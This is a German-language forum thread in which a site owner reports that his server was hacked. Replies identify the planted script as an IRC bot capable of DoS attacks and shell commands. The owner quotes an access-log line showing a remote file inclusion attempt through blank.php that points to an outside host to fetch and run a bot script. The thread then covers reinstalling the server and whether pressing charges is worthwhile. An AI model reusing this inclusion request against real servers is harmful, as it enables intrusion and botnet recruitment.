Server gehackt...

[pr0j3ctx]

naja wirklich nen sinn macht es nicht.. aber es lief auch kein prozess...

kann mir jemand grob sagen was die mit diesem script machen können?

sprich meinen Server steuern oder so?
sofern das script gestartet wurden wäre

[rootsvr]

Sofern ich das überblickt habe ist das nen IRC Bot, der verbindet sich zu:
irc.zerofuzion.net
channel #uol

Und wartet da auf Commandos, kann DoS Angriffe ausführen (sub attacker)
Kann Shellbefehle ausführen (sub shell)

Kann Dateien mittels Dcc senden und Empfangen

usw..

mit dem Shell Zeugs hat er eigentlich schon freie Hand..

[Joe User]

Bekannter IRC-Bot (wurde im RF schon behandelt), der unter Anderem zum Ausführen von D(D)OS-Attacken und auch schon zur Installation von Rootkits genutzt wurde/wird. Du kommst also um eine Reinitialisierung des Systems nicht umhin...

[pr0j3ctx]

Heute morgen haben sie versucht zu starten

200.101.235.177 - - [05/May/2006:04:53:46 +0200] "GET /blank.php?path=http://xpl.netmisphere2.com/cmd.gif?&cm ... %20b0t.txt HTTP/1.1" 200 533 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

[chris76]

Du willst nicht ernsthaft behaupten das Dein Server immer noch läuft? :evil:

[pr0j3ctx]

Doch das tut er wieder.

Hab ihn neu installen lassen und ein Backup meiner Homepage wieder eingespielt mit gefixxter blank.php.

Wollte nur damit sagen das sie jetzt versuchen wollten das Script zu starten, was sie beim vorigen mal ja nicht getan haben. Oder besser gesagt anscheinend nicht getan haben.

Jetzt stellt sich mir eigentlich nur die Frage inwiefern sich eine Anzeige in diesem Sinne lohnt. Ob sich da in Brasilien was tut. Hab keine Lust nachher irgendwelche Kosten deswegen an der Backe zu haben.

Gruß

[lord_pinhead]

Wie hoch ist die Chance ein Prozess um den halben Globus in ein Land zu führen das nichtmal Gesetze gegen Computerkriminalität kennt? Also viel wirst du nicht schaffen, im höchstfall würde ich da eine Abusemeldung an den Provider schicken und selbst das kann dem egal sein.

[pr0j3ctx]

Das dachte ich mir auch, wahrscheinlich selbst wenn derjenige aus Deutschland käm würde nicht viel bei rumkommen.

Das einzige was ich denke wozu es sinn macht ist wohl falls mit dem Server attacken gefahren wurden, was ich nicht glaube aber auch nicht ausschliessen kann, mich damit ein wenig abzusichern falls geschädigte auf mich zu kommen.

Grüße

[lord_pinhead]

Das dachte ich mir auch, wahrscheinlich selbst wenn derjenige aus Deutschland käm würde nicht viel bei rumkommen.

Das einzige was ich denke wozu es sinn macht ist wohl falls mit dem Server attacken gefahren wurden, was ich nicht glaube aber auch nicht ausschliessen kann, mich damit ein wenig abzusichern falls geschädigte auf mich zu kommen.

Grüße

In Deutschland gehts noch wenn du die Logfiles hast und es nachweisen kannst. Ausserhalb von Deutschland wird es schwierig, oft sind deren Behörden recht langsam was das angeht, Beispiel Italien, dort kannst du nur mit Abuse arbeiten und hoffen das etwas passiert.